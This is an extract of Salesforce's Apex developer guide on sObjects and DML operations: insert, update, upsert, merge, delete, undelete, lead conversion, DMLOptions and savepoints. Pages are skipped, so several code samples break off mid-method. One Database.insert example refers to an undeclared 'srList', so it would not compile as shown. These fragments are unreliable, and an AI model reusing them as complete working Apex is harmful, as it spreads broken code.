operation, or is assigned with a constructor. The Force.com platform assigns ID values automatically when an object record is
initially inserted to the database for the first time. For more information see Lists on page 29.
Custom Labels
Custom labels are not standard sObjects. You cannot create a new instance of a custom label. You can only access the value of a custom
label using system.label.label_name. For example:
String errorMsg = System.Label.generic_error;
For more information on custom labels, see Custom Labels Overview in the Salesforce online help.
102
System generated fields, such as Created By or Last Modified Date, cannot be modified. If you try, the Apex runtime
engine generates an error. Additionally, formula field values and values for other fields that are read-only for the context user cannot be
changed.
If you use the generic sObject type instead of a specific object, such as Account, you can retrieve only the Id field using dot notation.
You can set the Id field for Apex code saved using Salesforce API version 27.0 and later). Alternatively, you can use the generic sObject
put and get methods. See sObject Class.
This example shows how you can access the Id field and operations that arent allowed on generic sObjects.
Account a = new Account(Name = 'Acme', BillingCity = 'San Francisco');
insert a;
sObject s = [SELECT Id, Name FROM Account WHERE Name = 'Acme' LIMIT 1];
// This is allowed
ID id = s.Id;
// The following line results in an error when you try to save
String x = s.Name;
// This line results in an error when you try to save using API version 26.0 or earlier
s.Id = [SELECT Id FROM Account WHERE Name = 'Acme' LIMIT 1].Id;
Note: If your organization has enabled person accounts, you have two different kinds of accounts: business accounts and person
accounts. If your code creates a new account using name, a business account is created. If your code uses LastName, a person
account is created.
If you want to perform operations on an sObject, it is recommended that you first convert it into a specific object. For example:
Account a = new Account(Name = 'Acme', BillingCity = 'San Francisco');
insert a;
sObject s = [SELECT Id, Name FROM Account WHERE Name = 'Acme' LIMIT 1];
ID id = s.ID;
Account convertedAccount = (Account)s;
convertedAccount.name = 'Acme2';
update convertedAccount;
Contact sal = new Contact(FirstName = 'Sal', Account = convertedAccount);
The following example shows how you can use SOSL over a set of records to determine their object types. Once you have converted
the generic sObject record into a Contact, Lead, or Account, you can modify its fields accordingly:
public class convertToCLA {
List<Contact> contacts;
List<Lead> leads;
List<Account> accounts;
public void convertType(Integer phoneNumber) {
List<List<sObject>> results = [FIND '4155557000'
IN Phone FIELDS
RETURNING Contact(Id, Phone, FirstName, LastName),
Lead(Id, Phone, FirstName, LastName), Account(Id, Phone, Name)];
sObject[] records = ((List<sObject>)results[0]);
103
if (!records.isEmpty()) {
for (Integer i = 0; i < records.size(); i++) {
sObject record = records[i];
if (record.getSObjectType() == Contact.sObjectType) {
contacts.add((Contact) record);
} else if (record.getSObjectType() == Lead.sObjectType){
leads.add((Lead) record);
} else if (record.getSObjectType() == Account.sObjectType) {
accounts.add((Account) record);
}
}
}
}
}
104
DML
In the previous example, the account referenced by the variable a exists in memory with the required Name field. However, it is not
persisted yet to the Force.com platform persistence layer. You need to call DML statements to persist sObjects to the database. Here is
an example of creating and persisting this account using the insert statement.
Account a = new Account(Name='Account Example');
insert a;
Also, you can use DML to modify records that have already been inserted. Among the operations you can perform are record updates,
deletions, restoring records from the Recycle Bin, merging records, or converting leads. After querying for records, you get sObject
instances that you can modify and then persist the changes of. This is an example of querying for an existing record that has been
previously persisted, updating a couple of fields on the sObject representation of this record in memory, and then persisting this change
to the database.
// Query existing account.
Account a = [SELECT Name,Industry
FROM Account
WHERE Name='Account Example' LIMIT 1];
// Write the old values the debug log before updating them.
System.debug('Account Name before update: ' + a.Name); // Name is Account Example
System.debug('Account Industry before update: ' + a.Industry);// Industry is not set
// Modify the two fields on the sObject.
a.Name = 'Account of the Day';
a.Industry = 'Technology';
// Persist the changes.
update a;
// Get a new copy of the account from the database with the two fields.
Account a = [SELECT Name,Industry
FROM Account
WHERE Name='Account of the Day' LIMIT 1];
// Verify that updated field values were persisted.
System.assertEquals('Account of the Day', a.Name);
System.assertEquals('Technology', a.Industry);
DML
DML Statements vs. Database Class Methods
Apex offers two ways to perform DML operations: using DML statements or Database class methods. This provides flexibility in how you
perform data operations. DML statements are more straightforward to use and result in exceptions that you can handle in your code.
This is an example of a DML statement to insert a new record.
// Create the list of sObjects to insert
List<Account> acctList = new List<Account>();
acctList.add(new Account(Name='Acme1'));
acctList.add(new Account(Name='Acme2'));
105
// DML statement
insert acctList;
This is an equivalent example to the previous one but it uses a method of the Database class instead of the DML verb.
// Create the list of sObjects to insert
List<Account> acctList = new List<Account>();
acctList.add(new Account(Name='Acme1'));
acctList.add(new Account(Name='Acme2'));
// DML statement
Database.SaveResult[] sr = Database.insert(acctList, false);
// Iterate through each returned result
for (Database.SaveResult sr : srList) {
if (sr.isSuccess()) {
// Operation was successful, so get the ID of the record that was processed
System.debug('Successfully inserted account. Account ID: ' + sr.getId());
}
else {
// Operation failed, so get all errors
for(Database.Error err : sr.getErrors()) {
System.debug('The following error has occurred.');
System.debug(err.getStatusCode() + ': ' + err.getMessage());
System.debug('Account fields that affected this error: ' + err.getFields());
}
}
}
One difference between the two options is that by using the Database class method, you can specify whether or not to allow for partial
record processing if errors are encountered. You can do so by passing an additional second Boolean parameter. If you specify false
for this parameter and if a record fails, the remainder of DML operations can still succeed. Also, instead of exceptions, a result object
array (or one result object if only one sObject was passed in) is returned containing the status of each operation and any errors encountered.
By default, this optional parameter is true, which means that if at least one sObject cant be processed, all remaining sObjects wont
and an exception will be thrown for the record that causes a failure.
The following helps you decide when you want to use DML statements or Database class methods.
Use DML statements if you want any error that occurs during bulk DML processing to be thrown as an Apex exception that immediately
interrupts control flow (by using try. . .catch blocks). This behavior is similar to the way exceptions are handled in most
database procedural languages.
Use Database class methods if you want to allow partial success of a bulk DML operationif a record fails, the remainder of the DML
operation can still succeed. Your application can then inspect the rejected records and possibly retry the operation. When using this
form, you can write code that never throws DML exception errors. Instead, your code can use the appropriate results array to judge
success or failure. Note that Database methods also include a syntax that supports thrown exceptions, similar to DML statements.
Note: Most operations overlap between the two, except for a few.
The convertLead operation is only available as a Database class method, not as a DML statement.
The Database class also provides methods not available as DML statements, such as methods transaction control and rollback,
emptying the Recycle Bin, and methods related to SOQL queries.
106
This is a modified version of the previous example that doesnt hit the governor limit. It bulkifies DML operations by calling update
on a list of contacts. This counts as one DML statement, which is far below the limit of 150.
// List to hold the new contacts to update.
List<Contact> updatedList = new List<Contact>();
for(Contact con : conList) {
if (con.Department == 'Finance') {
con.Description = 'New description';
// Add updated contact sObject to the list.
updatedList.add(con);
}
}
// Call update on the list of contacts.
// This results in one DML call for the entire list.
update updatedList;
107
DML Operations
The other governor limit that affects DML operations is the total number of 10,000 rows that can be processed by DML operations in a
single transaction. All rows processed by all DML calls in the same transaction count incrementally toward this limit. For example, if you
insert 100 contacts and update 50 contacts in the same transaction, your total DML processed rows are 150 and you still have 9,850 rows
left (10,000 - 150).
DML Operations
Inserting and Updating Records
Using DML, you can insert new records and commit them to the database. Similarly, you can update the field values of existing records.
This example shows how to insert three account records and update an existing account record. First, it creates three Account sObjects
and adds them to a list. It then performs a bulk insertion by inserting the list of accounts using one insert statement. Next, it queries
the second account record, updates the billing city, and calls the update statement to persist the change in the database.
Account[] accts = new List<Account>();
for(Integer i=0;i<3;i++) {
Account a = new Account(Name='Acme' + i,
BillingCity='San Francisco');
accts.add(a);
}
Account accountToUpdate;
try {
insert accts;
// Update account Acme2.
accountToUpdate =
[SELECT BillingCity FROM Account
WHERE Name='Acme2' AND BillingCity='San Francisco'
LIMIT 1];
// Update the billing city.
accountToUpdate.BillingCity = 'New York';
// Make the update call.
update accountToUpdate;
} catch(DmlException e) {
System.debug('An unexpected error has occurred: ' + e.getMessage());
}
// Verify that the billing city was updated to New York.
Account afterUpdate =
[SELECT BillingCity FROM Account WHERE Id=:accountToUpdate.Id];
System.assertEquals('New York', afterUpdate.BillingCity);
108
DML Operations
109
DML Operations
Creating Parent and Child Records in a Single Statement Using Foreign Keys
You can use external ID fields as foreign keys to create parent and child records of different sObject types in a single step instead of
creating the parent record first, querying its ID, and then creating the child record. To do this:
Create the child sObject and populate its required fields, and optionally other fields.
Create the parent reference sObject used only for setting the parent foreign key reference on the child sObject. This sObject has only
the external ID field defined and no other fields set.
Set the foreign key field of the child sObject to the parent reference sObject you just created.
Create another parent sObject to be passed to the insert statement. This sObject must have the required fields (and optionally
other fields) set in addition to the external ID field.
Call insert by passing it an array of sObjects to create. The parent sObject must precede the child sObject in the array, that is,
the array index of the parent must be lower than the childs index.
You can create related records that are up to 10 levels deep. Also, the related records created in a single call must have different sObject
types. For more information, see Creating Records for Different Object Types in the SOAP API Developer's Guide.
The following example shows how to create an opportunity with a parent account using the same insert statement. The example
creates an Opportunity sObject and populates some of its fields, then creates two Account objects. The first account is only for the foreign
key relationship, and the second is for the account creation and has the account fields set. Both accounts have the external ID field,
MyExtID__c, set. Next, the sample calls Database.insert by passing it an array of sObjects. The first element in the array is
the parent sObject and the second is the opportunity sObject. The Database.insert statement creates the opportunity with its
parent account in a single step. Finally, the sample checks the results and writes the IDs of the created records to the debug log, or the
first error if record creation fails. This sample requires an external ID text field on Account called MyExtID.
public class ParentChildSample {
public static void InsertParentChild() {
Date dt = Date.today();
dt = dt.addDays(7);
Opportunity newOpportunity = new Opportunity(
Name='OpportunityWithAccountInsert',
StageName='Prospecting',
CloseDate=dt);
// Create the parent reference.
// Used only for foreign key reference
// and doesn't contain any other fields.
Account accountReference = new Account(
MyExtID__c='SAP111111');
newOpportunity.Account = accountReference;
// Create the Account object to insert.
// Same as above but has Name field.
// Used for the insert.
Account parentAccount = new Account(
Name='Hallie',
MyExtID__c='SAP111111');
110
DML Operations
Upserting Records
Using the upsert operation, you can either insert or update an existing record in one call. To determine whether a record already
exists, the upsert statement or Database method uses the records ID as the key to match records, or the custom external ID field
value, if specified.
If the key is not matched, then a new object record is created.
If the key is matched once, then the existing object record is updated.
If the key is matched multiple times, then an error is generated and the object record is neither inserted or updated.
Note: Custom field matching is case-insensitive only if the custom field has the Unique and Treat "ABC" and "abc" as duplicate
values (case insensitive) attributes selected as part of the field definition. If this is the case, ABC123 is matched with abc123.
For more information, see Create Custom Fields in the Salesforce Help.
Examples
The following example updates the city name for all existing accounts located in the city formerly known as Bombay, and also inserts a
new account located in San Francisco:
Account[] acctsList = [SELECT Id, Name, BillingCity
FROM Account WHERE BillingCity = 'Bombay'];
for (Account a : acctsList) {
a.BillingCity = 'Mumbai';
}
Account newAcct = new Account(Name = 'Acme', BillingCity = 'San Francisco');
acctsList.add(newAcct);
try {
upsert acctsList;
} catch (DmlException e) {
// Process exception here
}
Note: For more information on processing DmlExceptions, see Bulk DML Exception Handling on page 129.
111
DML Operations
This next example uses the Database.upsert method to upsert a collection of leads that are passed in. This example allows for
partial processing of records, that is, in case some records fail processing, the remaining records are still inserted or updated. It iterates
through the results and adds a new task to each record that was processed successfully. The task sObjects are saved in a list, which is
then bulk inserted. This example is followed by a test class that contains a test method for testing the example.
/* This class demonstrates and tests the use of the
* partial processing DML operations */
public class DmlSamples {
/* This method accepts a collection of lead records and
creates a task for the owner(s) of any leads that were
created as new, that is, not updated as a result of the upsert
operation */
public static List<Database.upsertResult> upsertLeads(List<Lead> leads)
/* Perform the upsert. In this case the unique identifier for the
insert or update decision is the Salesforce record ID. If the
record ID is null the row will be inserted, otherwise an update
will be attempted. */
List<Database.upsertResult> uResults = Database.upsert(leads,false);
/* This is the list for new tasks that will be inserted when new
leads are created. */
List<Task> tasks = new List<Task>();
for(Database.upsertResult result:uResults) {
if (result.isSuccess() && result.isCreated())
tasks.add(new Task(Subject = 'Follow-up', WhoId = result.getId()));
}
/* If there are tasks to be inserted, insert them */
Database.insert(tasks);
return uResults;
}
}
@isTest
private class DmlSamplesTest {
public static testMethod void testUpsertLeads() {
/* We only need to test the insert side of upsert */
List<Lead> leads = new List<Lead>();
/* Create a set of leads for testing */
for(Integer i = 0;i < 100; i++) {
leads.add(new Lead(LastName = 'testLead', Company = 'testCompany'));
}
/* Switch to the runtime limit context */
Test.startTest();
/* Exercise the method */
List<Database.upsertResult> results = DmlSamples.upsertLeads(leads);
112
DML Operations
Use of upsert with an external ID can reduce the number of DML statements in your code, and help you to avoid hitting governor
limits (see Understanding Execution Governors and Limits). This next example uses upsert and an external ID field
Line_Item_Id__c on the Asset object to maintain a one-to-one relationship between an asset and an opportunity line item.
Note: Before running this sample, create a custom text field on the Asset object named Line_Item_Id__c and mark it as
an external ID. For information on custom fields, see the Salesforce online help.
public void upsertExample() {
Opportunity opp = [SELECT Id, Name, AccountId,
(SELECT Id, PricebookEntry.Product2Id, PricebookEntry.Name
FROM OpportunityLineItems)
FROM Opportunity
WHERE HasOpportunityLineItem = true
LIMIT 1];
Asset[] assets = new Asset[]{};
// Create an asset for each line item on the opportunity
for (OpportunityLineItem lineItem:opp.OpportunityLineItems) {
//This code populates the line item Id, AccountId, and Product2Id for each asset
Asset asset = new Asset(Name = lineItem.PricebookEntry.Name,
Line_Item_ID__c = lineItem.Id,
AccountId = opp.AccountId,
Product2Id = lineItem.PricebookEntry.Product2Id);
assets.add(asset);
}
try {
upsert assets Line_Item_ID__c;
//
//
//
//
113
DML Operations
} catch (DmlException e) {
System.debug(e.getMessage());
}
}
Merging Records
When you have duplicate lead, contact, or account records in the database, cleaning up your data and consolidating the records might
be a good idea. You can merge up to three records of the same sObject type. The merge operation merges up to three records into
one of the records, deletes the others, and reparents any related records.
Example
The following shows how to merge an existing Account record into a master account. The account to merge has a related contact, which
is moved to the master account record after the merge operation. Also, after merging, the merge record is deleted and only one record
remains in the database. This examples starts by creating a list of two accounts and inserts the list. Then it executes queries to get the
new account records from the database, and adds a contact to the account to be merged. Next, it merges the two accounts. Finally, it
verifies that the contact has been moved to the master account and the second account has been deleted.
// Insert new accounts
List<Account> ls = new List<Account>{
new Account(name='Acme Inc.'),
new Account(name='Acme')
};
insert ls;
// Queries to get the inserted accounts
Account masterAcct = [SELECT Id, Name FROM Account WHERE Name = 'Acme Inc.' LIMIT 1];
Account mergeAcct = [SELECT Id, Name FROM Account WHERE Name = 'Acme' LIMIT 1];
// Add a contact to the account to be merged
Contact c = new Contact(FirstName='Joe',LastName='Merged');
c.AccountId = mergeAcct.Id;
insert c;
try {
merge masterAcct mergeAcct;
} catch (DmlException e) {
// Process exception
System.debug('An unexpected error has occurred: ' + e.getMessage());
}
// Once the account is merged with the master account,
// the related contact should be moved to the master record.
masterAcct = [SELECT Id, Name, (SELECT FirstName,LastName From Contacts)
FROM Account WHERE Name = 'Acme Inc.' LIMIT 1];
System.assert(masterAcct.getSObjects('Contacts').size() > 0);
System.assertEquals('Joe', masterAcct.getSObjects('Contacts')[0].get('FirstName'));
System.assertEquals('Merged', masterAcct.getSObjects('Contacts')[0].get('LastName'));
// Verify that the merge record got deleted
Account[] result = [SELECT Id, Name FROM Account WHERE Id=:mergeAcct.Id];
System.assertEquals(0, result.size());
114
DML Operations
This second example is similar to the previous except that it uses the Database.merge method (instead of the merge statement).
The last argument of Database.merge is set to false to have any errors encountered in this operation returned in the merge
result instead of getting exceptions. The example merges two accounts into the master account and retrieves the returned results. The
example creates a master account and two duplicates, one of which has a child contact. It verifies that after the merge the contact is
moved to the master account.
// Create master account
Account master = new Account(Name='Account1');
insert master;
// Create duplicate accounts
Account[] duplicates = new Account[]{
// Duplicate account
new Account(Name='Account1, Inc.'),
// Second duplicate account
new Account(Name='Account 1')
};
insert duplicates;
// Create child contact and associate it with first account
Contact c = new Contact(firstname='Joe',lastname='Smith', accountId=duplicates[0].Id);
insert c;
Merge Considerations
When merging sObject records, consider the following rules and guidelines:
115
DML Operations
Only leads, contacts, and accounts can be merged. See sObjects That Dont Support DML Operations on page 128.
You can pass a master record and up to two additional sObject records to a single merge method.
Using the Apex merge operation, field values on the master record always supersede the corresponding field values on the records
to be merged. To preserve a merged record field value, simply set this field value on the master sObject before performing the merge.
External ID fields cant be used with merge.
For more information on merging leads, contacts and accounts, see the Salesforce online help.
Deleting Records
After you persist records in the database, you can delete those records using the delete operation. Deleted records arent deleted
permanently from Force.com, but they are placed in the Recycle Bin for 15 days from where they can be restored. Restoring deleted
records is covered in a later section.
Example
The following example deletes all accounts that are named 'DotCom':
Account[] doomedAccts = [SELECT Id, Name FROM Account
WHERE Name = 'DotCom'];
try {
delete doomedAccts;
} catch (DmlException e) {
// Process exception here
}
Note: For more information on processing DmlExceptions, see Bulk DML Exception Handling on page 129.
116
DML Operations
Note: Salesforce only restores lookup relationships that have not been replaced. For example, if an asset is related to a different
product prior to the original product record being undeleted, that asset-product relationship is not restored.
Example
The following example undeletes an account named 'Trump'. The ALL ROWS keyword queries all rows for both top level and aggregate
relationships, including deleted records and archived activities.
Account a = new Account(Name='Trump');
insert(a);
insert(new Contact(LastName='Carter',AccountId=a.Id));
delete a;
Account[] savedAccts = [SELECT Id, Name FROM Account WHERE Name = 'Trump' ALL ROWS];
try {
undelete savedAccts;
} catch (DmlException e) {
// Process exception here
}
Note: For more information on processing DmlExceptions, see Bulk DML Exception Handling on page 129.
Undelete Considerations
Note the following when using the undelete statement.
You can undelete records that were deleted as the result of a merge, but the child objects will have been reparented, which cannot
be undone.
Use the ALL ROWS parameters with a SOQL query to identify deleted records, including records deleted as a result of a merge.
See Referential Integrity When Deleting and Restoring Records.
SEE ALSO:
Querying All Records with a SOQL Statement
Converting Leads
The convertLead DML operation converts a lead into an account and contact, as well as (optionally) an opportunity. convertLead
is available only as a method on the Database class; it is not available as a DML statement.
Converting leads involves the following basic steps:
1. Your application determines the IDs of any lead(s) to be converted.
117
DML Operations
2. Optionally, your application determines the IDs of any account(s) into which to merge the lead. Your application can use SOQL to
search for accounts that match the lead name, as in the following example:
SELECT Id, Name FROM Account WHERE Name='CompanyNameOfLeadBeingMerged'
3. Optionally, your application determines the IDs of the contact or contacts into which to merge the lead. The application can use
SOQL to search for contacts that match the lead contact name, as in the following example:
SELECT Id, Name FROM Contact WHERE FirstName='FirstName' AND LastName='LastName' AND
AccountId = '001...'
4. Optionally, the application determines whether opportunities should be created from the leads.
5. The application queries the LeadSource table to obtain all of the possible converted status options (SELECT ... FROM
LeadStatus WHERE IsConverted='1'), and then selects a value for the converted status.
6. The application calls convertLead.
7. The application iterates through the returned result or results and examines each LeadConvertResult object to determine whether
conversion succeeded for each lead.
8. Optionally, when converting leads owned by a queue, the owner must be specified. This is because accounts and contacts cannot
be owned by a queue. Even if you are specifying an existing account or contact, you must still specify an owner.
Example
This example shows how to use the Database.convertLead method to convert a lead. It inserts a new lead, creates a
LeadConvert object and sets its status to converted, then passes it to the Database.convertLead method. Finally, it verifies
that the conversion was successful.
Lead myLead = new Lead(LastName = 'Fry', Company='Fry And Sons');
insert myLead;
Database.LeadConvert lc = new database.LeadConvert();
lc.setLeadId(myLead.id);
LeadStatus convertStatus = [SELECT Id, MasterLabel FROM LeadStatus WHERE IsConverted=true
LIMIT 1];
lc.setConvertedStatus(convertStatus.MasterLabel);
Database.LeadConvertResult lcr = Database.convertLead(lc);
System.assert(lcr.isSuccess());
118
If the desired lead source values are not available, add the values to the default record type of the user converting the lead. For more
information about record types, see the Salesforce online help.
Picklist values: The system assigns the default picklist values for the account, contact, and opportunity when mapping any standard
lead picklist fields that are blank. If your organization uses record types, blank values are replaced with the default picklist values of
the new record owner.
Automatic feed subscriptions: When you convert a lead into a new account, contact, and opportunity, the lead owner is unsubscribed
from the lead account. The lead owner, the owner of the generated records, and users that were subscribed to the lead arent
automatically subscribed to the generated records, unless they have automatic subscriptions enabled in their Chatter feed settings.
They must have automatic subscriptions enabled to see changes to the account, contact, and opportunity records in their news
feed. To subscribe to records they create, users must enable the Automatically follow records that I create
option in their personal settings. A user can subscribe to a record so that changes to the record display in the news feed on the user's
home page. This is a useful way to stay up-to-date with changes to records in Salesforce.
Result Class
insert, update
SaveResult Class
upsert
UpsertResult Class
merge
MergeResult Class
delete
DeleteResult Class
undelete
UndeleteResult Class
convertLead
LeadConvertResult Class
emptyRecycleBin
EmptyRecycleBinResult Class
119
Example
This example shows how to get the errors returned by a Database.insert operation. It inserts two accounts, one of which doesnt
have the required Name field, and sets the second parameter to false: Database.insert(accts, false);. This sets the
partial processing option. Next, the example checks if the call had any failures through if (!sr.isSuccess()) and then iterates
through the errors, writing error information to the debug log.
// Create two accounts, one of which is missing a required field
Account[] accts = new List<Account>{
new Account(Name='Account1'),
new Account()};
Database.SaveResult[] srList = Database.insert(accts, false);
// Iterate through each returned result
for (Database.SaveResult sr : srList) {
if (!sr.isSuccess()) {
// Operation failed, so get all errors
for(Database.Error err : sr.getErrors()) {
System.debug('The following error has occurred.');
System.debug(err.getStatusCode() + ': ' + err.getMessage());
System.debug('Fields that affected this error: ' + err.getFields());
}
}
}
120
allowFieldTruncation Property
The allowFieldTruncation property specifies the truncation behavior of strings. In Apex saved against API versions previous
to 15.0, if you specify a value for a string and that value is too large, the value is truncated. For API version 15.0 and later, if a value is
specified that is too large, the operation fails and an error message is returned. The allowFieldTruncation property allows you
to specify that the previous behavior, truncation, be used instead of the new behavior in Apex saved against API versions 15.0 and later.
The allowFieldTruncation property takes a Boolean value. If true, the property truncates String values that are too long,
which is the behavior in API versions 14.0 and earlier. For example:
Database.DMLOptions dml = new Database.DMLOptions();
dml.allowFieldTruncation = true;
assignmentRuleHeader Property
The assignmentRuleHeader property specifies the assignment rule to be used when creating a case or lead.
Note: The Database.DMLOptions object supports assignment rules for cases and leads, but not for accounts or territory management.
Using the assignmentRuleHeader property, you can set these options:
assignmentRuleID: The ID of an assignment rule for the case or lead. The assignment rule can be active or inactive. The ID
can be retrieved by querying the AssignmentRule sObject. If specified, do not specify useDefaultRule. If the value is not in
the correct ID format (15-character or 18-character Salesforce ID), the call fails and an exception is returned.
Note: For the Case sObject, the assignmentRuleID DML option can be set only from the API and is ignored when set
from Apex. For example, you can set the assignmentRuleID for an active or inactive rule from the
executeanonymous() API call, but not from the Developer Console. This doesnt apply to leadsthe
assignmentRuleID DML option can be set for leads from both Apex and the API.
useDefaultRule: Indicates whether the default (active) assignment rule will be used for a case or lead. If specified, do not
specify an assignmentRuleId.
The following example uses the useDefaultRule option:
Database.DMLOptions dmo = new Database.DMLOptions();
dmo.assignmentRuleHeader.useDefaultRule= true;
Lead l = new Lead(company='ABC', lastname='Smith');
l.setOptions(dmo);
insert l;
121
Note: If there are no assignment rules in the organization, in API version 29.0 and earlier, creating a case or lead with
useDefaultRule set to true results in the case or lead being assigned to the predefined default owner. In API version 30.0
and later, the case or lead is unassigned and doesn't get assigned to the default owner.
emailHeader Property
The Salesforce user interface allows you to specify whether or not to send an email when the following events occur:
Creation of a new case or task
Conversion of a case email to a contact
New user email notification
Lead queue email notification
Password reset
In Apex saved against API version 15.0 or later, the Database.DMLOptions emailHeader property enables you to specify additional
information regarding the email that gets sent when one of the events occurs because of Apex DML code execution.
Using the emailHeader property, you can set these options.
triggerAutoResponseEmail: Indicates whether to trigger auto-response rules (true) or not (false), for leads and cases.
This email can be automatically triggered by a number of events, for example when creating a case or resetting a user password. If
this value is set to true, when a case is created, if there is an email address for the contact specified in ContactID, the email is
sent to that address. If not, the email is sent to the address specified in SuppliedEmail.
triggerOtherEmail: Indicates whether to trigger email outside the organization (true) or not (false). This email can be
automatically triggered by creating, editing, or deleting a contact for a case.
triggerUserEmail: Indicates whether to trigger email that is sent to users in the organization (true) or not (false). This
email can be automatically triggered by a number of events; resetting a password, creating a new user, or creating or modifying a
task.
Note: Adding comments to a case in Apex doesnt trigger email to users in the organization even if triggerUserEmail
is set to true.
Even though auto-sent emails can be triggered by actions in the Salesforce user interface, the DMLOptions settings for emailHeader
take effect only for DML operations carried out in Apex code.
In the following example, the triggerAutoResponseEmail option is specified:
Account a = new Account(name='Acme Plumbing');
insert a;
Contact c = new Contact(email='[email protected]', firstname='Joe',lastname='Plumber',
accountid=a.id);
insert c;
122
Email sent through Apex because of a group event includes additional behaviors. A group event is an event for which IsGroupEvent
is true. The EventAttendee object tracks the users, leads, or contacts that are invited to a group event. Note the following behaviors for
group event email sent through Apex:
Sending a group event invitation to a user respects the triggerUserEmail option
Sending a group event invitation to a lead or contact respects the triggerOtherEmail option
Email sent when updating or deleting a group event also respects the triggerUserEmail and triggerOtherEmail
options, as appropriate
localeOptions Property
The localeOptions property specifies the language of any labels that are returned by Apex. The value must be a valid user locale
(language and country), such as de_DE or en_GB. The value is a String, 2-5 characters long. The first two characters are always an ISO
language code, for example 'fr' or 'en.' If the value is further qualified by a country, then the string also has an underscore (_) and another
ISO country code, for example 'US' or 'UK.' For example, the string for the United States is 'en_US', and the string for French Canadian is
'fr_CA.'
For a list of the languages that Salesforce supports, see What languages does Salesforce support? in the Salesforce online help.
optAllOrNone Property
The optAllOrNone property specifies whether the operation allows for partial success. If optAllOrNone is set to true, all
changes are rolled back if any record causes errors. The default for this property is false and successfully processed records are
committed while records with errors aren't. This property is available in Apex saved against Salesforce API version 20.0 and later.
Transaction Control
All requests are delimited by the trigger, class method, Web Service, Visualforce page or anonymous block that executes the Apex code.
If the entire request completes successfully, all changes are committed to the database. For example, suppose a Visualforce page called
an Apex controller, which in turn called an additional Apex class. Only when all the Apex code has finished running and the Visualforce
page has finished running, are the changes committed to the database. If the request does not complete successfully, all database
changes are rolled back.
Sometimes during the processing of records, your business rules require that partial work (already executed DML statements) be rolled
back so that the processing can continue in another direction. Apex gives you the ability to generate a savepoint, that is, a point in the
request that specifies the state of the database at that time. Any DML statement that occurs after the savepoint can be discarded, and
the database can be restored to the same condition it was in at the time you generated the savepoint.
The following limitations apply to generating savepoint variables and rolling back the database:
If you set more than one savepoint, then roll back to a savepoint that is not the last savepoint you generated, the later savepoint
variables become invalid. For example, if you generated savepoint SP1 first, savepoint SP2 after that, and then you rolled back
to SP1, the variable SP2 would no longer be valid. You will receive a runtime error if you try to use it.
123
References to savepoints cannot cross trigger invocations because each trigger invocation is a new trigger context. If you declare a
savepoint as a static variable then try to use it across trigger contexts, you will receive a run-time error.
Each savepoint you set counts against the governor limit for DML statements.
Static variables are not reverted during a rollback. If you try to run the trigger again, the static variables retain the values from the
first run.
Each rollback counts against the governor limit for DML statements. You will receive a runtime error if you try to rollback the database
additional times.
The ID on an sObject inserted after setting a savepoint is not cleared after a rollback. Create new a sObject to insert after a rollback.
Attempting to insert the sObject using the variable created before the rollback fails because the sObject variable has an ID. Updating
or upserting the sObject using the same variable also fails because the sObject is not in the database and, thus, cannot be updated.
The following is an example using the setSavepoint and rollback Database methods.
Account a = new Account(Name = 'xxx'); insert a;
System.assertEquals(null, [SELECT AccountNumber FROM Account WHERE Id = :a.Id].
AccountNumber);
// Create a savepoint while AccountNumber is null
Savepoint sp = Database.setSavepoint();
// Change the account number
a.AccountNumber = '123';
update a;
System.assertEquals('123', [SELECT AccountNumber FROM Account WHERE Id = :a.Id].
AccountNumber);
// Rollback to the previous null value
Database.rollback(sp);
System.assertEquals(null, [SELECT AccountNumber FROM Account WHERE Id = :a.Id].
AccountNumber);
124
QueueSObject
ObjectTerritory2AssignmentRule
ObjectTerritory2AssignmentRuleItem
RuleTerritory2Association
SetupEntityAccess
Territory2
Territory2Model
UserTerritory2Association
User
You can insert a user in a transaction with other sObjects in Apex code saved using Salesforce API version 14.0 and earlier.
You can insert a user in a transaction with other sObjects in Apex code saved using Salesforce API version 15.0 and later if
UserRoleId is specified as null.
You can update a user in a transaction with other sObjects in Apex code saved using Salesforce API version 14.0 and earlier
You can update a user in a transaction with other sObjects in Apex code saved using Salesforce API version 15.0 and later if the
following fields are not also updated:
UserRoleId
IsActive
ForecastEnabled
IsPortalEnabled
Username
ProfileId
UserRole
UserTerritory
Territory
Custom settings in Apex code saved using Salesforce API version 17.0 and earlier.
If you are using a Visualforce page with a custom controller, you can only perform DML operations on a single type of sObject within a
single request or action. However, you can perform DML operations on different types of sObjects in subsequent requests, for example,
you can create an account with a save button, then create a user with a submit button.
You can perform DML operations on more than one type of sObject in a single class using the following process:
1. Create a method that performs a DML operation on one type of sObject.
2. Create a second method that uses the future annotation to manipulate a second sObject type.
This process is demonstrated in the example in the next section.
125
126
languagelocalekey='en_US',
localesidkey='en_US', profileid = p.Id, userroleid = r.Id,
timezonesidkey='America/Los_Angeles',
username='[email protected]');
insert u;
a = new Account(name='Acme');
insert a;
}
}
}
Using Test.startTest and Test.stopTest to bypass the mixed DML error in a Test Method
The mixed DML exception error is still sometimes returned even if you enclose the code block that performs the mixed DML operations
within a System.runAs block. This can occur if the test method calls a future method that performs a DML operation that cant be
mixed with others, such as deleting a group. If you get the mixed DML exception in this case, enclose the code block that makes the
future method call within Test.startTest and Test.stopTest statements.
This example shows how enclosing the delete statement between Test.startTest and Test.stopTest statements
prevents the mixed DML exception error in a test. Because the delete statement causes a mixed DML operation to be executed by
a future method, it is enclosed within the Test.startTest and Test.stopTest statements. The delete statement causes
a trigger to fire, deleting the group that was inserted earlier by the account insert trigger by calling the deleteGroup future method
of the Util class.
This is the test class that causes a mixed DML operation to occur. The account insertion and deletion fire the triggers.
@isTest
private class RunasTest {
static testMethod void mixeddmltest() {
// Create the account and group.
Account ac = new Account(Name='TEST ACCOUNT');
// Group is created in the insert trigger.
insert ac;
// Set up user
User u1 = [SELECT Id FROM User WHERE UserName='[email protected]'];
System.RunAs(u1){
// Add startTest and stopTest to avoid mixed DML error
Test.startTest();
// Delete the account.
// Group is deleted through future method call in trigger.
delete ac;
Test.stopTest();
}
}
}
127
This is the account delete trigger that calls a future method to delete a group.
trigger Account_Before_Delete_Trg on Account (before delete) {
Util.deleteGroup('Test');
}
128
129
The ID of an updated sObject record cannot be modified in an update statement, but related record IDs can.
Fields With Unique Constraints
For some sObjects that have fields with unique constraints, inserting duplicate sObject records results in an error. For example,
inserting CollaborationGroup sObjects with the same names results in an error because CollaborationGroup records must have
unique names.
System Fields Automatically Set
When inserting new records, system fields such as CreatedDate, CreatedById, and SystemModstamp are automatically
updated. You cannot explicitly specify these values in your Apex. Similarly, when updating records, system fields such as
LastModifiedDate, LastModifiedById, and SystemModstamp are automatically updated.
Maximum Number of Records Processed by DML Statement
